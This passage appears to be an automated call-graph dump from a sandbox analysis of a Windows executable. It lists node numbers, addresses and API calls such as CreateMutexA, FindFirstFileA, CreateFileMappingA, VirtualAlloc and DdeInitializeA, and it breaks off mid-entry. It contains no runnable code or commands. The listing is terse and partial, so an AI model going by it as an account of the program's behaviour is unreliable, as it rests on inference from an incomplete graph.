10ddc5f _ValidateLocalCookies 5 API calls 8970 10db2e1 8969->8970 8970->8941 8971 10dc95e MultiByteToWideChar 8974 10dc977 8971->8974 8987 10dc9ca 8971->8987 8972->8971 8972->8987 8973->8972 8992 10da9e8 8974->8992 8976 10da61a __freea 20 API calls 8976->8978 8978->8969 8979 10dc9d9 8981 10dbd19 __onexit 21 API calls 8979->8981 8985 10dc9fa __alloca_probe_16 8979->8985 8980 10dc9a1 8982 10da9e8 12 API calls 8980->8982 8980->8987 8981->8985 8982->8987 8983 10dca6f 8984 10da61a __freea 20 API calls 8983->8984 8984->8987 8985->8983 8986 10da9e8 12 API calls 8985->8986 8988 10dca4e 8986->8988 8987->8976 8988->8983 8989 10dca5d WideCharToMultiByte 8988->8989 8989->8983 8990 10dca9d 8989->8990 8991 10da61a __freea 20 API calls 8990->8991 8991->8987 8993 10da714 ___FrameUnwindToState 5 API calls 8992->8993 8994 10daa0f 8993->8994 8995 10daa3f 8994->8995 8996 10daa18 LCMapStringEx 8994->8996 9003 10daa70 8995->9003 9000 10daa5f 8996->9000 9001 10ddc5f _ValidateLocalCookies 5 API calls 9000->9001 9002 10daa6a 9001->9002 9002->8979 9002->8980 9002->8987 9004 10da714 ___FrameUnwindToState 5 API calls 9003->9004 9005 10daa97 9004->9005 9006 10ddc5f _ValidateLocalCookies 5 API calls 9005->9006 9007 10daa58 LCMapStringW 9006->9007 9007->9000 9009 10dafec ___scrt_is_nonwritable_in_current_image 9008->9009 9016 10daf81 EnterCriticalSection 9009->9016 9011 10daff6 9017 10db04b 9011->9017 9015 10db00f ___scrt_is_nonwritable_in_current_image 9015->8775 9016->9011 9029 10db76b 9017->9029 9019 10db099 9020 10db76b 26 API calls 9019->9020 9021 10db0b5 9020->9021 9022 10db76b 26 API calls 9021->9022 9023 10db0d3 9022->9023 9024 10db003 9023->9024 9025 10da6da _free 20 API calls 9023->9025 9026 10db017 9024->9026 9025->9024 9043 10dafc9 LeaveCriticalSection 9026->9043 9028 10db021 9028->9015 9030 10db77c 9029->9030 9039 10db778 9029->9039 9031 10db783 9030->9031 9034 10db796 ___scrt_fastfail 9030->9034 9032 10d9826 _free 20 API calls 9031->9032 9033 10db788 9032->9033 9035 10d976a _abort 26 API calls 9033->9035 9036 10db7cd 9034->9036 9037 10db7c4 9034->9037 9034->9039 9035->9039 9036->9039 9041 10d9826 _free 20 API calls 9036->9041 9038 10d9826 _free 20 API calls 9037->9038 9040 10db7c9 9038->9040 9039->9019 9042 10d976a _abort 26 API calls 9040->9042 9041->9040 9042->9039 9043->9028 8669 10e12db 8678 10e1d19 GetEnvironmentStringsW 8669->8678 8673 10da6da _free 20 API calls 8674 10e1328 8673->8674 8675 10e12fe 8676 10da6da _free 20 API calls 8675->8676 8677 10e12f3 8676->8677 8677->8673 8679 10e1d2d 8678->8679 8680 10e12ed 8678->8680 8702 10dbd19 8679->8702 8680->8677 8685 10e132e 8680->8685 8682 10e1d41 8683 10da6da _free 20 API calls 8682->8683 8684 10e1d5b FreeEnvironmentStringsW 8683->8684 8684->8680 8688 10e134c 8685->8688 8686 10da67d ___FrameUnwindToState 20 API calls 8698 10e1386 8686->8698 8687 10e13f7 8689 10da6da _free 20 API calls 8687->8689 8688->8686 8688->8688 8690 10e1411 8689->8690 8690->8675 8691 10da67d ___FrameUnwindToState 20 API calls 8691->8698 8692 10e13f9 8718 10e1428 8692->8718 8696 10da6da _free 20 API calls 8696->8687 8697 10e141b 8699 10d977a _abort 11 API calls 8697->8699 8698->8687 8698->8691 8698->8692 8698->8697 8700 10da6da _free 20 API calls 8698->8700 8709 10dbd67 8698->8709 8701 10e1427 8699->8701 8700->8698 8703 10dbd57 8702->8703 8704 10dbd27 ___FrameUnwindToState 8702->8704 8705 10d9826 _free 20 API calls 8703->8705 8704->8703 8706 10dbd42 RtlAllocateHeap 8704->8706 8708 10dc6ac ___FrameUnwindToState 7 API calls 8704->8708 8707 10dbd55 8705->8707 8706->8704 8706->8707 8707->8682 8708->8704 8710 10dbd74 8709->8710 8711 10dbd82 8709->8711 8710->8711 8714 10dbd9b 8710->8714 8712 10d9826 _free 20 API calls 8711->8712 8713 10dbd8c 8712->8713 8715 10d976a _abort 26 API calls 8713->8715 8716 10dbd96 8714->8716 8717 10d9826 _free 20 API calls 8714->8717 8715->8716 8716->8698 8717->8713 8722 10e1435 8718->8722 8723 10e13ff 8718->8723 8719 10e144c 8721 10da6da _free 20 API calls 8719->8721 8720 10da6da _free 20 API calls 8720->8722 8721->8723 8722->8719 8722->8720 8723->8696 9044 10ddadb 9049 10ddedd SetUnhandledExceptionFilter 9044->9049 9046 10ddae0 pre_c_initialization 9050 10dc748 9046->9050 9048 10ddaeb 9049->9046 9051 10dc76e 9050->9051 9052 10dc754 9050->9052 9051->9048 9052->9051 9053 10d9826 _free 20 API calls 9052->9053 9054 10dc75e 9053->9054 9055 10d976a _abort 26 API calls 9054->9055 9056 10dc769 9055->9056 9056->9048 8012 10ddaed 8013 10ddaf9 ___scrt_is_nonwritable_in_current_image 8012->8013 8037 10de373 8013->8037 8015 10ddb00 8017 10ddb29 8015->8017 8082 10ddd8f IsProcessorFeaturePresent 8015->8082 8021 10ddb68 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 8017->8021 8048 10dd336 8017->8048 8023 10ddbc8 8021->8023 8086 10dc2fb 8021->8086 8022 10ddb48 ___scrt_is_nonwritable_in_current_image 8056 10ddeaa 8023->8056 8025 10ddbce 8060 10d1f80 8025->8060 8038 10de37c 8037->8038 8093 10de0be IsProcessorFeaturePresent 8038->8093 8042 10de38d 8043 10de391 8042->8043 8104 10e16b7 8042->8104 8043->8015 8046 10de3a8 8046->8015 8050 10dd34d 8048->8050 8049 10ddc5f _ValidateLocalCookies 5 API calls 8051 10dd377 8049->8051 8050->8049 8051->8022 8052 10dd2da 8051->8052 8055 10dd309 8052->8055 8053 10ddc5f _ValidateLocalCookies 5 API calls 8054 10dd332 8053->8054 8054->8021 8055->8053 8375 10df070 8056->8375 8058 10ddebd GetStartupInfoW 8059 10dded0 8058->8059 8059->8025 8061 10d1fda 8060->8061 8062 10d2202 8060->8062 8063 10d1feb 8061->8063 8064 10d2117 8061->8064 8065 10d2428 CloseHandle GetCurrentProcessId 8062->8065 8066 10d2213 8062->8066 8401 10d3690 8063->8401 8064->8062 8071 10d2165 GetModuleHandleA 8064->8071 8419 10e5ff0 8065->8419 8391 10e55c0 8066->8391 8070 10d207d 8377 10d3e70 8070->8377 8413 10e8570 8071->8413 8072 10d24ab MultiByteToWideChar 8077 10d2575 ExitProcess 8072->8077 8073 10d227e 8395 10e7440 8073->8395 8079 10d20e9 8079->8062 8080 10d23fe 8080->8077 8081 10d23c9 DdeInitializeA 8081->8080 8083 10ddda5 ___scrt_fastfail 8082->8083 8084 10dde4d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8083->8084 8085 10dde97 8084->8085 8085->8015 8087 10dc323 try_get_function 8086->8087 8088 10dd762 ___FrameUnwindToState 8086->8088 8087->8023 8484 10d9c30 GetLastError 8088->8484 8092 10dd773 8504 10da63a 8092->8504 8094 10de0e4 8093->8094 8095 10df376 8094->8095 8096 10df37b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8095->8096 8115 10e049e 8096->8115 8099 10df389 8099->8042 8101 10df391 8102 10df39c 8101->8102 8129 10e04da 8101->8129 8102->8042 8170 10e21e0 8104->8170 8107 10df39f 8108 10df3a8 8107->8108 8109 10df3b9 8107->8109 8110 10df4e9 ___vcrt_uninitialize_ptd 6 API calls 8108->8110 8109->8043 8111 10df3ad 8110->8111 8112 10e04da ___vcrt_uninitialize_locks DeleteCriticalSection 8111->8112 8113 10df3b2 8112->8113 8371 10e0795 8113->8371 8116 10e04a7 8115->8116 8118 10e04d0 8116->8118 8120 10df385 8116->8120 8133 10e0715 8116->8133 8119 10e04da ___vcrt_uninitialize_locks DeleteCriticalSection 8118->8119 8119->8120 8120->8099 8121 10df4b6 8120->8121 8151 10e062a 8121->8151 8123 10df4c0 8128 10df4cb 8123->8128 8156 10e06d8 8123->8156 8125 10df4d9 8126 10df4e6 8125->8126 8161 10df4e9 8125->8161 8126->8101 8128->8101 8130 10e0504 8129->8130 8131 10e04e5 8129->8131 8130->8099 8132 10e04ef DeleteCriticalSection 8131->8132 8132->8130 8132->8132 8138 10e0509 8133->8138 8135 10e072f 8136 10e074c InitializeCriticalSectionAndSpinCount 8135->8136 8137 10e0738 8135->8137 8136->8137 8137->8116 8142 10e0539 8138->8142 8143 10e053d try_get_function 8138->8143 8139 10e055d 8141 10e0569 GetProcAddress 8139->8141 8139->8143 8141->8143 8142->8139 8142->8143 8144 10e05a9 8142->8144 8143->8135 8145 10e05c6 8144->8145 8146 10e05d1 LoadLibraryExW 8144->8146 8145->8142 8147 10e05ed GetLastError 8146->8147 8148 10e0605 8146->8148 8147->8148 8150 10e05f8 LoadLibraryExW 8147->8150 8148->8145 8149 10e061c FreeLibrary 8148->8149 8149->8145 8150->8148 8152 10e0509 try_get_function 5 API calls 8151->8152 8153 10e0644 8152->8153 8154 10e065c TlsAlloc 8153->8154 8155 10e064d 8153->8155 8155->8123 8157 10e0509 try_get_function 5 API calls 8156->8157 8158 10e06f2 8157->8158 8159 10e070c TlsSetValue 8158->8159 8160 10e0701 8158->8160 8159->8160 8160->8125 8162 10df4f9 8161->8162 8163 10df4f3 8161->8163 8162->8128 8165 10e0664 8163->8165 8166 10e0509 try_get_function 5 API calls 8165->8166 8167 10e067e 8166->8167 8168 10e0695 TlsFree 8167->8168 8169 10e068a 8167->8169 8168->8169 8169->8162 8173 10e21fd 8170->8173 8174 10e21f9 8170->8174 8172 10de39a 8172->8046 8172->8107 8173->8174 8176 10e215e 8173->8176 8188 10ddc5f 8174->8188 8177 10e216a ___scrt_is_nonwritable_in_current_image 8176->8177 8195 10daf81 EnterCriticalSection 8177->8195 8179 10e2171 8196 10e1e18 8179->8196 8181 10e2180 8187 10e218f 8181->8187 8209 10e1ff2 GetStartupInfoW 8181->8209 8185 10e21a0 ___scrt_is_nonwritable_in_current_image 8185->8173 8220 10e21ab 8187->8220 8189 10ddc68 8188->8189 8190 10ddc6a IsProcessorFeaturePresent 8188->8190 8189->8172 8192 10ddfd7 8190->8192 8370 10ddf9b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8192->8370 8194 10de0ba 8194->8172 8195->8179 8197 10e1e24 ___scrt_is_nonwritable_in_current_image 8196->8197 8198 10e1e48 8197->8198 8199 10e1e31 8197->8199 8223 10daf81 EnterCriticalSection 8198->8223 8231 10d9826 8199->8231 8203 10e1e54 8208 10e1e80 8203->8208 8224 10e1d69 8203->8224 8207 10e1e40 ___scrt_is_nonwritable_in_current_image 8207->8181 8237 10e1ea7 8208->8237 8210 10e200f 8209->8210 8211 10e20a1 8209->8211 8210->8211 8212 10e1e18 27 API calls 8210->8212 8215 10e20a8 8211->8215 8213 10e2038 8212->8213 8213->8211 8214 10e2066 GetFileType 8213->8214 8214->8213 8216 10e20af 8215->8216 8217 10e20f2 GetStdHandle 8216->8217 8218 10e215a 8216->8218 8219 10e2105 GetFileType 8216->8219 8217->8216 8218->8187 8219->8216 8369 10dafc9 LeaveCriticalSection 8220->8369 8222 10e21b2 8222->8185 8223->8203 8240 10da67d 8224->8240 8226 10e1d88 8254 10da6da 8226->8254 8229 10e1dda 8229->8203 8230 10e1d7b 8230->8226 8247 10da986 8230->8247 8289 10d9cb4 GetLastError 8231->8289 8234 10d976a 8347 10d96ef 8234->8347 8236 10d9776 8236->8207 8368 10dafc9 LeaveCriticalSection 8237->8368 8239 10e1eae 8239->8207 8244 10da68a ___FrameUnwindToState 8240->8244 8241 10da6ca 8245 10d9826 _free 19 API calls 8241->8245 8242 10da6b5 RtlAllocateHeap 8243 10da6c8 8242->8243 8242->8244 8243->8230 8244->8241 8244->8242 8260 10dc6ac 8244->8260 8245->8243 8275 10da714 8247->8275 8250 10da9cb InitializeCriticalSectionAndSpinCount 8251 10da9b6 8250->8251 8252 10ddc5f _ValidateLocalCookies 5 API calls 8251->8252 8253 10da9e2 8252->8253 8253->8230 8255 10da6e5 HeapFree 8254->8255 8256 10da70e _free 8254->8256 8255->8256 8257 10da6fa 8255->8257 8256->8229 8258 10d9826 _free 18 API calls 8257->8258 8259 10da700 GetLastError 8258->8259 8259->8256 8265 10dc6f0 8260->8265 8262 10ddc5f _ValidateLocalCookies 5 API calls 8264 10dc6ec 8262->8264 8263 10dc6c2 8263->8262 8264->8244 8266 10dc6fc ___scrt_is_nonwritable_in_current_image 8265->8266 8271 10daf81 EnterCriticalSection 8266->8271 8268 10dc707 8272 10dc739 8268->8272 8270 10dc72e ___scrt_is_nonwritable_in_current_image 8270->8263 8271->8268 8273 10dafc9 _abort LeaveCriticalSection 8272->8273 8274 10dc740 8273->8274 8274->8270 8276 10da744 8275->8276 8279 10da740 8275->8279 8276->8250 8276->8251 8277 10da764 8277->8276 8280 10da770 GetProcAddress 8277->8280 8279->8276 8279->8277 8282 10da7b0 8279->8282 8281 10da780 try_get_function 8280->8281 8281->8276 8283 10da7c6 8282->8283 8284 10da7d1 LoadLibraryExW 8282->8284 8283->8279 8285 10da7ee GetLastError 8284->8285 8286 10da806 8284->8286 8285->8286 8287 10da7f9 LoadLibraryExW 8285->8287 8286->8283 8288 10da81d FreeLibrary 8286->8288 8287->8286 8288->8283 8290 10d9ccd 8289->8290 8291 10d9cd3 8289->8291 8308 10da8d7 8290->8308 8292 10da67d ___FrameUnwindToState 17 API calls 8291->8292 8294 10d9d2a SetLastError 8291->8294 8296 10d9ce5 8292->8296 8297 10d982b 8294->8297 8295 10d9ced 8299 10da6da _free 17 API calls 8295->8299 8296->8295 8315 10da92d 8296->8315 8297->8234 8301 10d9cf3 8299->8301 8303 10d9d21 SetLastError 8301->8303 8302 10d9d09 8322 10d9aa2 8302->8322 8303->8297 8306 10da6da _free 17 API calls 8307 10d9d1a 8306->8307 8307->8294 8307->8303 8309 10da714 ___FrameUnwindToState 5 API calls 8308->8309 8310 10da8fe 8309->8310 8311 10da916 TlsGetValue 8310->8311 8314 10da90a 8310->8314 8311->8314 8312 10ddc5f _ValidateLocalCookies 5 API calls 8313 10da927 8312->8313 8313->8291 8314->8312 8316 10da714 ___FrameUnwindToState 5 API calls 8315->8316 8317 10da954 8316->8317 8318 10da96f TlsSetValue 8317->8318 8320 10da963 8317->8320 8318->8320 8319 10ddc5f _ValidateLocalCookies 5 API calls 8321 10d9d02 8319->8321 8320->8319 8321->8295 8321->8302 8327 10d9a7a 8322->8327 8333 10d99ba 8327->8333 8329 10d9a9e 8330 10d9a2a 8329->8330 8339 10d98be 8330->8339 8332 10d9a4e 8332->8306 8334 10d99c6 ___scrt_is_nonwritable_in_current_image 8333->8334 8335 10daf81 _abort EnterCriticalSection 8334->8335 8336 10d99d0 8335->8336 8337 10d99f6 ___FrameUnwindToState LeaveCriticalSection 8336->8337 8338 10d99ee ___scrt_is_nonwritable_in_current_image 8337->8338 8338->8329 8340 10d98ca ___scrt_is_nonwritable_in_current_image 8339->8340 8341 10daf81 _abort EnterCriticalSection 8340->8341 8342 10d98d4 8341->8342 8343 10d9be5 ___FrameUnwindToState 20 API calls 8342->8343 8344 10d98ec 8343->8344 8345 10d9902 ___FrameUnwindToState LeaveCriticalSection 8344->8345 8346 10d98fa ___scrt_is_nonwritable_in_current_image 8345->8346 8346->8332 8348 10d9cb4 _abort 20 API calls 8347->8348 8349 10d9705 8348->8349 8350 10d9764 8349->8350 8351 10d9713 8349->8351 8358 10d977a IsProcessorFeaturePresent 8350->8358 8356 10ddc5f _ValidateLocalCookies 5 API calls 8351->8356 8353 10d9769 8354 10d96ef _abort 26 API calls 8353->8354 8355 10d9776 8354->8355 8355->8236 8357 10d973a 8356->8357 8357->8236 8359 10d9785 8358->8359 8362 10d95a0 8359->8362 8363 10d95bc _abort ___scrt_fastfail 8362->8363 8364 10d95e8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8363->8364 8365 10d96b9 _abort 8364->8365 8366 10ddc5f _ValidateLocalCookies 5 API calls 8365->8366 8367 10d96d7 GetCurrentProcess TerminateProcess 8366->8367 8367->8353 8368->8239 8369->8222 8370->8194 8372 10e079e 8371->8372 8374 10e07c4 8371->8374 8373 10e07ae FreeLibrary 8372->8373 8372->8374 8373->8372 8374->8109 8376 10df087 8375->8376 8376->8058 8376->8376 8378 10d3ee8 8377->8378 8390 10d40d5 8377->8390 8379 10d40ec 8378->8379 8380 10d3ef9 8378->8380 8383 10d414e CreateFileMappingA 8379->8383 8379->8390 8421 10d3450 8380->8421 8384 10d4135 8383->8384 8384->8379 8385 10e8570 2 API calls 8386 10d4007 8385->8386 8427 10d47e0 8386->8427 8390->8079 8392 10e5cbb 8391->8392 8394 10e5631 8391->8394 8393 10e5d0e ReadFile 8392->8393 8392->8394 8393->8394 8394->8073 8396 10e77a4 8395->8396 8400 10d2336 8395->8400 8397 10e7819 8396->8397 8396->8400 8453 10d2800 8397->8453 8399 10e78bf 8399->8400 8400->8080 8400->8081 8402 10d396b 8401->8402 8403 10d36fa 8401->8403 8404 10d2800 4 API calls 8402->8404 8405 10d2800 4 API calls 8403->8405 8406 10d3a1a CreateMutexA GetModuleHandleA 8404->8406 8407 10d374f 8405->8407 8408 10e5ea0 FindFirstFileA 8406->8408 8459 10d1000 8407->8459 8412 10d3841 8408->8412 8411 10d2590 2 API calls 8411->8412 8412->8070 8414 10e8747 CreateFileA 8413->8414 8415 10e85e5 8413->8415 8416 10e883c 8414->8416 8417 10e5ea0 FindFirstFileA 8415->8417 8416->8079 8418 10e8642 8417->8418 8418->8416 8420 10e62e3 8419->8420 8420->8072 8422 10d35fc 8421->8422 8423 10d34a4 8421->8423 8422->8385 8424 10d354e 8423->8424 8435 10d3d10 8423->8435 8424->8422 8426 10d363a GetModuleFileNameA 8424->8426 8426->8422 8428 10d4849 8427->8428 8430 10d406c 8427->8430 8429 10d4889 VirtualAlloc 8428->8429 8428->8430 8429->8430 8431 10d14c0 8430->8431 8433 10d153d 8431->8433 8432 10d1588 8432->8390 8433->8432 8445 10e8850 8433->8445 8436 10d3d80 8435->8436 8437 10d3d72 8435->8437 8436->8424 8437->8436 8439 10d2590 8437->8439 8440 10d2606 8439->8440 8443 10d2627 8439->8443 8440->8443 8444 10d274b GetCommandLineA 8440->8444 8441 10d2763 8441->8437 8442 10d27c2 GetCurrentActCtx 8442->8441 8443->8441 8443->8442 8444->8440 8446 10e8a81 8445->8446 8448 10e88ba 8445->8448 8446->8448 8449 10e5ea0 8446->8449 8448->8433 8450 10e5ef4 8449->8450 8451 10e5f4c 8450->8451 8452 10e5fa8 FindFirstFileA 8450->8452 8451->8448 8452->8450 8454 10d2b35 8453->8454 8455 10d2861 8453->8455 8457 10d2b67 GetCurrentActCtx CreateFileA WideCharToMultiByte 8454->8457 8458 10d2b12 8454->8458 8456 10e8850 FindFirstFileA 8455->8456 8456->8458 8457->8399 8458->8399 8460 10d106a 8459->8460 8467 10d122f 8459->8467 8461 10d107c 8460->8461 8462 10d1286 8460->8462 8468 10e8330 8461->8468 8464 10d12c7 WideCharToMultiByte CreateFileMappingA CreateMutexA 8462->8464 8462->8467 8464->8467 8467->8411 8469 10e838d 8468->8469 8474 10d110b 8468->8474 8470 10e839f 8469->8470 8471 10e8489 8469->8471 8481 10d3c20 8470->8481 8472 10e84cc SetHandleInformation 8471->8472 8471->8474 8472->8471 8475 10d3250 8474->8475 8476 10d32bb 8475->8476 8477 10d32c8 8475->8477 8476->8477 8479 10d32ea CloseHandle 8476->8479 8478 10d331a 8477->8478 8480 10d33f5 FindNextFileA 8477->8480 8478->8467 8479->8477 8480->8477 8482 10d3c97 ReleaseMutex 8481->8482 8483 10d3c77 8481->8483 8482->8483 8483->8474 8485 10d9c46 8484->8485 8486 10d9c4c 8484->8486 8488 10da8d7 ___FrameUnwindToState 11 API calls 8485->8488 8487 10da67d ___FrameUnwindToState 20 API calls 8486->8487 8490 10d9c9b SetLastError 8486->8490 8489 10d9c5e 8487->8489 8488->8486 8491 10d9c66 8489->8491 8492 10da92d ___FrameUnwindToState 11 API calls 8489->8492 8490->8092 8493 10da6da _free 20 API calls 8491->8493 8494 10d9c7b 8492->8494 8495 10d9c6c 8493->8495 8494->8491 8496 10d9c82 8494->8496 8497 10d9ca7 SetLastError 8495->8497 8498 10d9aa2 ___FrameUnwindToState 20 API calls 8496->8498 8499 10da63a _abort 44 API calls 8497->8499 8500 10d9c8d 8498->8500 8501 10d9cb3 8499->8501 8502 10da6da _free 20 API calls 8500->8502 8503 10d9c94 8502->8503 8503->8490 8503->8497 8513 10dc435 8504->8513 8506 10da63f 8506->8504 8508 10da654 IsProcessorFeaturePresent 8506->8508 8510 10d95a0 _abort 8 API calls 8506->8510 8512 10dd79d 8506->8512 8516 10dc490 8506->8516 8543 10dc2e5 8506->8543 8546 10df424 8506->8546 8508->8506 8510->8506 8562 10dc3a3 8513->8562 8517 10dc49c ___FrameUnwindToState 8516->8517 8518 10d9cb4 _abort 20 API calls 8517->8518 8521 10dc4c9 _abort 8517->8521 8524 10dc4c3 _abort 8517->8524 8518->8524 8519 10dc515 8520 10d9826 _free 20 API calls 8519->8520 8522 10dc51a 8520->8522 8532 10dc541 8521->8532 8576 10daf81 EnterCriticalSection 8521->8576 8525 10d976a _abort 26 API calls 8522->8525 8524->8519 8524->8521 8526 10dc4f8 8524->8526 8525->8526 8585 10de2e9 8526->8585 8530 10dc5a0 8540 10dc5cb 8530->8540 8578 10dc487 8530->8578 8531 10dc598 8533 10dc2e5 _abort 28 API calls 8531->8533 8532->8530 8532->8531 8532->8540 8577 10dafc9 LeaveCriticalSection 8532->8577 8533->8530 8537 10d9c30 ___FrameUnwindToState 47 API calls 8541 10dc62e 8537->8541 8539 10dc487 _abort 47 API calls 8539->8540 8581 10dc650 8540->8581 8541->8526 8542 10d9c30 ___FrameUnwindToState 47 API calls 8541->8542 8542->8526 8589 10dc0b0 8543->8589 8547 10df42d 8546->8547 8548 10df430 GetLastError 8546->8548 8547->8506 8664 10e069e 8548->8664 8550 10df445 8551 10df4aa SetLastError 8550->8551 8552 10e06d8 ___vcrt_FlsSetValue 6 API calls 8550->8552 8561 10df464 8550->8561 8551->8506 8553 10df45e 8552->8553 8554 10da67d ___FrameUnwindToState 20 API calls 8553->8554 8553->8561 8555 10df472 8554->8555 8556 10df486 8555->8556 8557 10e06d8 ___vcrt_FlsSetValue 6 API calls 8555->8557 8558 10e06d8 ___vcrt_FlsSetValue 6 API calls 8556->8558 8559 10df49a 8556->8559 8557->8556 8558->8559 8560 10da6da _free 20 API calls 8559->8560 8560->8561 8561->8551 8565 10dc349 8562->8565 8564 10dc3c7 8564->8506 8566 10dc355 ___scrt_is_nonwritable_in_current_image 8565->8566 8571 10daf81 EnterCriticalSection 8566->8571 8568 10dc363 8572 10dc397 8568->8572 8570 10dc38a ___scrt_is_nonwritable_in_current_image 8570->8564 8571->8568 8575 10dafc9 LeaveCriticalSection 8572->8575 8574 10dc3a1 8574->8570 8575->8574 8576->8532 8577->8531 8579 10d9c30 ___FrameUnwindToState 47 API calls 8578->8579 8580 10dc48c 8579->8580 8580->8539 8582 10dc61f 8581->8582 8583 10dc656 8581->8583 8582->8526 8582->8537 8582->8541 8588 10dafc9 LeaveCriticalSection 8583->8588 8586 10ddc5f _ValidateLocalCookies 5 API calls 8585->8586 8587 10de2f4 8586->8587 8587->8587 8588->8582 8590 10dc0bc ___FrameUnwindToState 8589->8590 8591 10dc0d4 8590->8591 8611 10dc20a GetModuleHandleW 8590->8611 8620 10daf81 EnterCriticalSection 8591->8620 8595 10dc17a 8624 10dc1ba 8595->8624 8598 10dc0dc 8598->8595 8600 10dc151 8598->8600 8621 10dd6e4 8598->8621 8601 10dc169 8600->8601 8605 10dd2da _abort 5 API calls 8600->8605 8606 10dd2da _abort 5 API calls 8601->8606 8602 10dc197 8627 10dc1c9 8602->8627 8603 10dc1c3 8604 10de2e9 _abort 5 API calls 8603->8604 8609 10dc1c8 8604->8609 8605->8601 8606->8595 8609->8506 8612 10dc0c8 8611->8612 8612->8591 8613 10dc24e GetModuleHandleExW 8612->8613 8614 10dc278 GetProcAddress 8613->8614 8615 10dc28d 8613->8615 8614->8615 8616 10dc2aa 8615->8616 8617 10dc2a1 FreeLibrary 8615->8617 8618 10ddc5f _ValidateLocalCookies 5 API calls 8616->8618 8617->8616 8619 10dc2b4 8618->8619 8619->8591 8620->8598 8635 10dd41d 8621->8635 8657 10dafc9 LeaveCriticalSection 8624->8657 8626 10dc193 8626->8602 8626->8603 8658 10daaf2 8627->8658 8630 10dc1f7 8633 10dc24e _abort 8 API calls 8630->8633 8631 10dc1d7 GetPEB 8631->8630 8632 10dc1e7 GetCurrentProcess TerminateProcess 8631->8632 8632->8630 8634 10dc1ff ExitProcess 8633->8634 8638 10dd3cc 8635->8638 8637 10dd441 8637->8600 8639 10dd3d8 ___scrt_is_nonwritable_in_current_image 8638->8639 8646 10daf81 EnterCriticalSection 8639->8646 8641 10dd3e6 8647 10dd46d 8641->8647 8645 10dd404 ___scrt_is_nonwritable_in_current_image 8645->8637 8646->8641 8648 10dd48d 8647->8648 8649 10dd495 8647->8649 8650 10ddc5f _ValidateLocalCookies 5 API calls 8648->8650 8649->8648 8652 10da6da _free 20 API calls 8649->8652 8651 10dd3f3 8650->8651 8653 10dd411 8651->8653 8652->8648 8656 10dafc9 LeaveCriticalSection 8653->8656 8655 10dd41b 8655->8645 8656->8655 8657->8626 8659 10dab17 8658->8659 8663 10dab0d 8658->8663 8660 10da714 ___FrameUnwindToState 5 API calls 8659->8660 8660->8663 8661 10ddc5f _ValidateLocalCookies 5 API calls 8662 10dab75 8661->8662 8662->8630 8662->8631 8663->8661 8665 10e0509 try_get_function 5 API calls 8664->8665 8666 10e06b8 8665->8666 8667 10e06cf TlsGetValue 8666->8667 8668 10e06c4 8666->8668 8667->8668 8668->8550 10106 10d9def 10107 10d9dfb ___scrt_is_nonwritable_in_current_image 10106->10107 10108 10d9e32 ___scrt_is_nonwritable_in_current_image 10107->10108 10114 10daf81 EnterCriticalSection 10107->10114 10110 10d9e0f 10111 10daef0 __fassign 20 API calls 10110->10111 10112 10d9e1f 10111->10112 10115 10d9e38 10112->10115 10114->10110 10118 10dafc9 LeaveCriticalSection 10115->10118 10117 10d9e3f 10117->10108 10118->10117 10124 10e28f8 10134 10e2f33 10124->10134 10128 10e2905 10147 10e30b4 10128->10147 10131 10e292f 10132 10da6da _free 20 API calls 10131->10132 10133 10e293a 10132->10133 10151 10e2f3c 10134->10151 10136 10e2900 10137 10e3014 10136->10137 10138 10e3020 ___scrt_is_nonwritable_in_current_image 10137->10138 10171 10daf81 EnterCriticalSection 10138->10171 10140 10e3096 10185 10e30ab 10140->10185 10142 10e306a DeleteCriticalSection 10145 10da6da _free 20 API calls 10142->10145 10143 10e30a2 ___scrt_is_nonwritable_in_current_image 10143->10128 10146 10e302b 10145->10146 10146->10140 10146->10142 10172 10e3e2c 10146->10172 10148 10e2914 DeleteCriticalSection 10147->10148 10149 10e30ca 10147->10149 10148->10128 10148->10131 10149->10148 10150 10da6da _free 20 API calls 10149->10150 10150->10148 10152 10e2f48 ___scrt_is_nonwritable_in_current_image 10151->10152 10161 10daf81 EnterCriticalSection 10152->10161 10154 10e2f57 10155 10e2feb 10154->10155 10160 10e2eec 75 API calls 10154->10160 10162 10e2944 EnterCriticalSection 10154->10162 10163 10e2fe1 10154->10163 10166 10e300b 10155->10166 10158 10e2ff7 ___scrt_is_nonwritable_in_current_image 10158->10136 10160->10154 10161->10154 10162->10154 10169 10e2958 LeaveCriticalSection 10163->10169 10165 10e2fe9 10165->10154 10170 10dafc9 LeaveCriticalSection 10166->10170 10168 10e3012 10168->10158 10169->10165 10170->10168 10171->10146 10173 10e3e38 ___scrt_is_nonwritable_in_current_image 10172->10173 10174 10e3e5e 10173->10174 10175 10e3e49 10173->10175 10184 10e3e59 ___scrt_is_nonwritable_in_current_image 10174->10184 10188 10e2944 EnterCriticalSection 10174->10188 10176 10d9826 _free 20 API calls 10175->10176 10177 10e3e4e 10176->10177 10179 10d976a _abort 26 API calls 10177->10179 10179->10184 10180 10e3e7a 10189 10e3db6 10180->10189 10182 10e3e85 10205 10e3ea2 10182->10205 10184->10146 10453 10dafc9 LeaveCriticalSection 10185->10453 10187 10e30b2 10187->10143 10188->10180 10190 10e3dd8 10189->10190 10191 10e3dc3 10189->10191 10197 10e3dd3 10190->10197 10208 10e2e86 10190->10208 10192 10d9826 _free 20 API calls 10191->10192 10194 10e3dc8 10192->10194 10196 10d976a _abort 26 API calls 10194->10196 10196->10197 10197->10182 10198 10e30b4 20 API calls 10199 10e3df4 10198->10199 10214 10e280a 10199->10214 10201 10e3dfa 10221 10e42ca 10201->10221 10204 10da6da _free 20 API calls 10204->10197 10452 10e2958 LeaveCriticalSection 10205->10452 10207 10e3eaa 10207->10184 10209 10e2e9e 10208->10209 10213 10e2e9a 10208->10213 10210 10e280a 26 API calls 10209->10210 10209->10213 10211 10e2ebe 10210->10211 10236 10e37b1 10211->10236 10213->10198 10215 10e282b 10214->10215 10216 10e2816 10214->10216 10215->10201 10217 10d9826 _free 20 API calls 10216->10217 10218 10e281b 10217->10218 10219 10d976a _abort 26 API calls 10218->10219 10220 10e2826 10219->10220 10220->10201 10222 10e42ee 10221->10222 10223 10e42d9 10221->10223 10224 10e4329 10222->10224 10228 10e4315 10222->10228 10225 10d9813 __dosmaperr 20 API calls 10223->10225 10226 10d9813 __dosmaperr 20 API calls 10224->10226 10227 10e42de 10225->10227 10229 